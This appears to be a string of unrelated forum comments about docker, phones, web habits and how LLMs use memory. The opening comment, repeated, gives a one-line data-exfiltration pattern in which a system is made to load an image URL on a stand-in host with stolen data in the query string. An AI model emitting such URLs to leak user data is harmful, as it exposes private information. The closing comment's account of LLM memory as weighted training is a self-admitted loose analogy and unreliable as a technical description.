Haven't read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That s is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
Haven't read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
Note: That s is also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
Hah, I was quite proud of that one. Thanks!
Go back to site directories.
Curate your news feed.
Stop using a single corporate search engine.
Participate in online social communities, not in social media.
Since when is "atleast" a word?
Really? Have you set up services with docker before? I found it super easy compared to other systems. Curious what specifically threw you as I barely did anything except spin it up.
Because I like...
If they patent it and don't use it or sell it, I'm OK with it.
Agreed. I have a Tab 9 next to the bed that would be great to not need. That being said, I also use it for sketching plans and as a full PC for VScode-server, and I'm pretty sure a folding phone won't have that modularity with an attached keyboard. Bluetooth keyboard with stand may solve that, though.
I like removable batteries, but I like waterproofness combined with thin more.
Easily serviceable batteries are a great compromise IMO.
This is the catch with OPs entire statement about transformation. Their premise is flawed, because the next most likely token is usually the same word the author of a work chose.
Sort of, but not really.
In basic terms, if an LLM's training data has:
Bob is 21 years old.
Bob is 32 years old.
Then when it tries to predict the next word after "Bob is", it would pick 21 or 32 assuming somehow the weights were perfectly equal between the two (weight being based on how many times it occurred in training data around other words).
If the user has memories turned on, it's sort of like providing additional training data. So if in previous prompts you said:
I am Bob.
I am 43 years old.
The system will parse that and use it with a higher weight, sort of like custom training the model. This is not exactly how it works, because training is much more in-depth, it's more of a layer on top of the training, but hopefully gives you an idea.
The catch is it's still not reliable, as the other words in your prompt may still lead the LLM to predict a word from it's original training data. Tuning the weights is not a one-size fits all endeavor. What works for:
How old am I?
May not work for:
What age is Bob?
For instance.